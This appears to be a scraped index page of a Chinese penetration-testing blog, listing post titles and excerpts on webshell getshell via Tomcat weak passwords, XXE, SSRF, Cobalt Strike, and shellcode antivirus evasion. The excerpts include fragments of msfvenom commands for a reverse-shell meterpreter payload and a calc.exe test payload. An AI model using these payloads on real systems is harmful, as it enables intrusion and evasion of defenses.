byzain.github.io's People
byzain.github.io's Issues
白嫖机场教程 | Zain
windows应急响应 | Zain
https://byzain.github.io/2021/05/04/windows%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/
开机启动排查 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 按下Win徽+R 输入msconfig 选择启动选项卡 任务管理器-启动选项卡 按下Win徽+R 输入regedit查找HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\
pte知识点 | Zain
https://byzain.github.io/2022/08/31/pte%E7%9F%A5%E8%AF%86%E7%82%B9/
这是一篇加密文章,需要密码才能继续阅读。
评论
神器收藏 | Zain
https://byzain.github.io/2022/07/05/%E7%A5%9E%E5%99%A8%E6%94%B6%E8%97%8F/
这是一篇加密文章,需要密码才能继续阅读。
制作自己专属的iso镜像 | Zain
很多时候想重装系统,但是又觉得配置环境麻烦。所以我们可以通过制作自己专属的iso文件,让重装的系统包含我们配置好的环境。
cobaltstrike中文乱码解决 | Zain
CobaltStrike 乱码解决Windows电脑上CS乱码了,文字都变成空心方块了。 这里总结了网上的所有方法,推荐使用方法3。
红队环境(Vulnstack4) | Zain
htaccess文件的深入学习 | Zain
基本概念.htaccess允许用户在此目录及子目录中按照.htaccess配置文件中的规则来解析。 需要注意的是:.htaccess中的配置会覆盖全局配置,另外如果子目录中也有.htaccess,其优先级会高于父目录,也就是会覆盖父目录中的规则。 管理员可以通过修改apache配置文件中的AllowOverride来开启.htaccess的解析。
使用atexec进行喷洒攻击 | Zain
ssrf小结 | Zain
https://byzain.github.io/2021/08/04/ssrf%E5%B0%8F%E7%BB%93/#more
前言前两天面试时突然问起SSRF,这词咋这么熟悉呢!但是又想不起来具体的内容,面试结束后翻阅文档觉得很遗憾,因为之前有学习过,不过时间长没用忘掉了,特此写一篇文章加深印象!
体验Midjourney作画 | Zain
上传博客的html页面格式
hello! 我对您的博客很感兴趣, 想以您的博客为模板进行fork, 在基础配置更改后, 我想知道写好一篇博客之后如何进行上传, 因为我看到每一篇博客的呈现形式都是一个html页面, 对此不是很清楚, 希望您可以解答一下~😊
Tomcat弱口令Getshell | Zain
https://byzain.github.io/Tomcat%E5%BC%B1%E5%8F%A3%E4%BB%A4Getshell/
常用用户admin/tomcat/root 生成恶意war包将冰蝎jsp木马打包成zip,修改zip后缀为war
xxe常用POC | Zain
https://byzain.github.io/2020/11/04/xxe%E5%B8%B8%E7%94%A8POC/
有回显xxe如果页面存在回显型xxe漏洞,页面会显示gg(poc) 1gg<\gg>
fofa语法收藏 | Zain
https://byzain.github.io/fofa%E8%AF%AD%E6%B3%95%E6%94%B6%E8%97%8F/
这是一篇加密文章,需要密码才能继续阅读。
虚拟磁盘转换 | Zain
cobaltstrike相关注意事项 | Zain
前言本文内容是基于cs4.3版本,讲了一些大家会遇到的一些坑。
通过DNSLOG回显验证漏洞 | Zain
通过DNSLOG回显验证漏洞前言 实际渗透测试中,有些漏洞因为没有回显导致无法准确判断漏洞是否存在,可能导致渗透测试人员浪费大量精力在一个并不存在的漏洞上,因此为了验证一些无回显漏洞,可结合DNSlog平台进行测试,本文使用的DNSlog平台链接如下:http://dnslog.cn/
抓取goby的poc | Zain
https://byzain.github.io/2022/03/15/%E6%8A%93%E5%8F%96goby%E7%9A%84poc/#more
前言goby内置了很多poc,如果有红队的试用版,可以尝试抓取一波,补充自己的弹药库。
metasploit生成木马 | Zain
https://byzain.github.io/2021/03/04/metasploit%E7%94%9F%E6%88%90%E6%9C%A8%E9%A9%AC/
生成跨平台脚本木马我们知道了可以使用msfvenom生成木马,针对脚本语言比如python、ruby、php甚至powershell,需要选择对应的payload后使用-f raw指定使用源码生成,如下所示: 生成powershell后门,meterpreter上线 1msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1
使用atexec进行喷洒攻击 | Zain
Docker常用命令 | Zain
https://byzain.github.io/2021/08/26/Docker%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/#more
容器&镜像操作进入容器 1docker exec -it /bin/bash 从dockerfile构建镜像 12docker build -t [自定义名称]:[自定义tag] .注意最后有个点 从镜像启动环境(随机端口) 1docker run -itd -P [指定镜像名称]:[指定镜像tag]
ssrf小结 | Zain
https://byzain.github.io/ssrf%E5%B0%8F%E7%BB%93/#more
前言前两天面试时突然问起SSRF,这词咋这么熟悉呢!但是又想不起来具体的内容,面试结束后翻阅文档觉得很遗憾,因为之前有学习过,不过时间长没用忘掉了,特此写一篇文章加深印象!
chromedp仿真爬虫 | Zain
https://byzain.github.io/2022/04/08/chromedp%E4%BB%BF%E7%9C%9F%E7%88%AC%E8%99%AB/
介绍golang仿真爬虫包 功能 完全模拟人工操作 支持Chrome DevTools Protocol
hyperv安装kali及其相关应用 | Zain
hyperv中安装2022版kali以及相关配置的的详细教程
ApacheLog4j2远程代码执行漏洞 | Zain
影响范围攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响
golang shellcode免杀 | Zain
https://byzain.github.io/golang-shellcode%E5%85%8D%E6%9D%80/
获得原始shellcode注意:生成shellcode时需要根据系统架构选择x86或者x64位shellcode,否则可能无法执行或者导致注入的原始进程崩溃。 msfvenom弹出计算机测试使用的shellcode: 1msfvenom -p windows/x64/exec CMD=calc.exe -f csharp
通过DNSLOG回显验证漏洞 | Zain
通过DNSLOG回显验证漏洞前言 实际渗透测试中,有些漏洞因为没有回显导致无法准确判断漏洞是否存在,可能导致渗透测试人员浪费大量精力在一个并不存在的漏洞上,因此为了验证一些无回显漏洞,可结合DNSlog平台进行测试,本文使用的DNSlog平台链接如下:http://dnslog.cn/
hexo | Zain
https://byzain.github.io/hexo/
部署hexo先安装nodejs,不然没法使用npm 12345678# 全局安装hexonpm install -g hexo-cli# 创建并初始化hexo文件夹hexo init <文件夹># 进入创建好的目录cd <文件夹> # 使用npm安装相关依赖npm install
制作自己专属的iso镜像 | Zain
很多时候想重装系统,但是又觉得配置环境麻烦。所以我们可以通过制作自己专属的iso文件,让重装的系统包含我们配置好的环境。
nmap测试大网络空间中存活的主机 | Zain
前言最近在做项目的时候由于客户Vlan划分的比较多,所以进行主机探测是一件特别消耗时间的工作,Nmap作为一款强大的探测工具怎么会没有这个功能呢?
白嫖机场教程 | Zain
https://byzain.github.io/%E7%99%BD%E5%AB%96%E6%9C%BA%E5%9C%BA%E6%95%99%E7%A8%8B/
这是一篇加密文章,需要密码才能继续阅读。
Tomcat弱口令Getshell | Zain
https://byzain.github.io/2022/08/26/Tomcat%E5%BC%B1%E5%8F%A3%E4%BB%A4Getshell/?
常用用户admin/tomcat/root 生成恶意war包将冰蝎jsp木马打包成zip,修改zip后缀为war
golang shellcode免杀 | Zain
https://byzain.github.io/2022/08/30/golang-shellcode%E5%85%8D%E6%9D%80/
获得原始shellcode注意:生成shellcode时需要根据系统架构选择x86或者x64位shellcode,否则可能无法执行或者导致注入的原始进程崩溃。 msfvenom弹出计算机测试使用的shellcode: 1msfvenom -p windows/x64/exec CMD=calc.exe -f csharp
hexo | Zain
https://byzain.github.io/2020/09/04/hexo/
部署hexo先安装nodejs,不然没法使用npm 12345678# 全局安装hexonpm install -g hexo-cli# 创建并初始化hexo文件夹hexo init <文件夹># 进入创建好的目录cd <文件夹> # 使用npm安装相关依赖npm install
抓取goby的poc | Zain
https://byzain.github.io/%E6%8A%93%E5%8F%96goby%E7%9A%84poc/?#%E5%B0%8F%E7%BB%93
前言goby内置了很多poc,如果有红队的试用版,可以尝试抓取一波,补充自己的弹药库。
体验Midjourney作画 | Zain
windows远程管理-WinRm | Zain
https://byzain.github.io/windows%E8%BF%9C%E7%A8%8B%E7%AE%A1%E7%90%86-WinRm/#more
WinRm介绍winRm默认开放端口为5985端口。 Windows远程管理是“WS 管理协议的 Microsoft 实施,该协议是基于标准 SOAP、不受防火墙影响的协议,允许不同供应商的硬件和操作系统相互操作。而微软将其包含在他们的系统中,是为了便于系统管理员在日常工作中,远程管理服务器,或通过脚本同时管理多台服务器,以提高他们的工作效率。
metasploit小结 | Zain
https://byzain.github.io/2021/03/04/metasploit%E5%B0%8F%E7%BB%93/
meterpreter shell常识 mefconsole启动时在哪个目录,下载下来的文件就在哪个目录,也可以通过lcd命令切换本地临时目录。 getuid:查看当前权限 edit命令:就是msf中的vim,edit 文件 pgrep命令:从进程中筛选,并显示pid,比如pgrep notepad
cobaltstrike相关注意事项 | Zain
前言本文内容是基于cs4.3版本,讲了一些大家会遇到的一些坑。
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.